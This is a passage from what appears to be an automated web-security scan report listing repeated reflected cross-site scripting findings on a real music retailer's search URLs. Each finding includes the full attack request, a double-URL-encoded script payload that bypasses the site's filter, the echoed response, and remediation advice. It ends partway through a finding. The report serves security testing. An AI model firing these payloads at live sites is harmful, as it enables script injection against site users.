GET /search/query/Canned%20Heat87cee%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e945b3aae3a0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1chgfconqiisvs7u4qe0qkupt6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=370527039; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490016212; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canned Heat87cee</title><script>alert(1)</script>945b3aae3a0</title>
...[SNIP]...

1.61. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cannibal%20Ox&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b63a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66a032306b4 was submitted in the REST URL parameter 3. This input was echoed as b63a3</title><script>alert(1)</script>66a032306b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cannibal%20Oxb63a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66a032306b4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6rokmsuat1mtmj2urrobr7s813; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=533483587; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=130784695; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cannibal Oxb63a3</title><script>alert(1)</script>66a032306b4</title>
...[SNIP]...

1.62. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cannibal%20Ox&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f188%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83905858b22 was submitted in the REST URL parameter 3. This input was echoed as 9f188"><script>alert(1)</script>83905858b22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cannibal%20Ox9f188%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83905858b22&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5f4ak8mrqkfpilsm0uudu8hc50; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=401603714; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=519769309; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cannibal Ox9f188"><script>alert(1)</script>83905858b22" />
...[SNIP]...

1.63. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cansei%20De%20Ser%20Sexy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcde0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2c1cf0e8a was submitted in the REST URL parameter 3. This input was echoed as dcde0"><script>alert(1)</script>a2c1cf0e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cansei%20De%20Ser%20Sexydcde0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2c1cf0e8a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=npiqgdqh8uticn63ajdvdm8ce2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=489373266; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=472335197; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cansei De Ser Sexydcde0"><script>alert(1)</script>a2c1cf0e8a" />
...[SNIP]...

1.64. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cansei%20De%20Ser%20Sexy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4aaa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e098fa7fb1b1 was submitted in the REST URL parameter 3. This input was echoed as 4aaa5</title><script>alert(1)</script>098fa7fb1b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cansei%20De%20Ser%20Sexy4aaa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e098fa7fb1b1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k8ugv1qrlkltje4crrr1ac61j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=314825418; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76478598; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cansei De Ser Sexy4aaa5</title><script>alert(1)</script>098fa7fb1b1</title>
...[SNIP]...

1.65. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8160%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea86437928d7 was submitted in the REST URL parameter 3. This input was echoed as c8160"><script>alert(1)</script>a86437928d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canyonc8160%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea86437928d7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=el64g281vs55aad7dvp7ahk394; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=484649954; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=41901122; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canyonc8160"><script>alert(1)</script>a86437928d7" />
...[SNIP]...

1.66. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 82e50%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0857b329499 was submitted in the REST URL parameter 3. This input was echoed as 82e50</title><script>alert(1)</script>0857b329499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canyon82e50%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0857b329499&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vn8103gq26jdh08g4ktseqboj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=490445033; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=319315191; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canyon82e50</title><script>alert(1)</script>0857b329499</title>
...[SNIP]...

1.67. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyons&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4aec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0586550ec47 was submitted in the REST URL parameter 3. This input was echoed as c4aec"><script>alert(1)</script>0586550ec47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canyonsc4aec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0586550ec47&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=23cfi7dkdv6euokblfnf809cb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562430432; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=260157307; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canyonsc4aec"><script>alert(1)</script>0586550ec47" />
...[SNIP]...

1.68. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyons&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload baf0d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f68ad9cfd1 was submitted in the REST URL parameter 3. This input was echoed as baf0d</title><script>alert(1)</script>3f68ad9cfd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canyonsbaf0d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f68ad9cfd1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=192g9qr8irckn6j07d67q5lmp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=15358187; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=348620053; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canyonsbaf0d</title><script>alert(1)</script>3f68ad9cfd1</title>
...[SNIP]...

1.69. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cap'n%20Jazz&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56c27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32f749fe2ff was submitted in the REST URL parameter 3. This input was echoed as 56c27"><script>alert(1)</script>32f749fe2ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cap'n%20Jazz56c27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32f749fe2ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ras5gq5ldjs5do65vde1vcajf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=98800130; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=173560589; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cap'n Jazz56c27"><script>alert(1)</script>32f749fe2ff" />
...[SNIP]...

1.70. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cap'n%20Jazz&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e32f6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec355903f322 was submitted in the REST URL parameter 3. This input was echoed as e32f6</title><script>alert(1)</script>c355903f322 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cap'n%20Jazze32f6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec355903f322&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qaht89fih3ci04hf1avtcfuk21; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=49091725; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=209453078; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cap'n Jazze32f6</title><script>alert(1)</script>c355903f322</title>
...[SNIP]...

1.71. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capgun%20Coup&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdc37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd2f0793f4b was submitted in the REST URL parameter 3. This input was echoed as cdc37"><script>alert(1)</script>dd2f0793f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capgun%20Coupcdc37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd2f0793f4b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2p4ihkcj1ge6bir4i2nkndned3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=181407271; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=135705573; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capgun Coupcdc37"><script>alert(1)</script>dd2f0793f4b" />
...[SNIP]...

1.72. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capgun%20Coup&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1e0a4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b98189875 was submitted in the REST URL parameter 3. This input was echoed as 1e0a4</title><script>alert(1)</script>2b98189875 in the application's response.

